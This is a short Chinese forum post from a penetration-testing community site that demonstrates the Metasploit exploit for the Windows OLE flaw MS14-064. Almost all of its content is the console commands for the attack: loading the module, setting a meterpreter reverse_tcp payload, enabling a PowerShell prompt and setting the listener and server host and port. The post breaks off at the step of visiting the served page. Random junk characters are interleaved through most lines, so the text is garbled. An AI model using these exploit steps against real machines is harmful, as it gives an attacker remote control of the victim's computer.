& t2 s4 ?: h- |* q3 l 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示/ u2 {; ]4 p# y0 S( z. R
$ {/ x. [ B; E% o2 Q
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
. m# k5 m6 u v5 K7 c/ u' u. a
7 B; K/ {5 f9 G$ e 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
, T0 ~0 M+ m" n" U set AllowPowershellPrompt true
7 ]) p9 f0 Y0 g9 K* S T4 q- {Set LHOST 192.168.0.109
% {. P. ^, J' g: O% @& Z( D set SRVHOST 192.168.0.109
Set uripath share3 Z$ T/ x0 i9 J+ y5 y+ R9 R
Set srvport 80- ?% Q: C, f7 f# L" I
9 U; J4 K: J4 M! E6 v0 Z5 n* I0 ?$ j
7 r' ]: x% E7 ?2 j0 s; n$ [3 ~
, ^; Y I+ e. a; o2 E* v
( K/ y5 E' w, h5 v1 z/ h5 W' s( ~" _2 l
. Z# I, C# Y$ Y! l) n$ N u+ l# D. J# K* v
) P8 R7 o3 x' r. l+ t+ t2 l* S
: x4 ~% ^( C5 ` A. J9 g6 @下面我们来访问本地地址如图:
, X' U0 k# X2 E7 w8 ~
; Z- l6 e- r* a% h. J) E# N# K! F9 w+ v
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |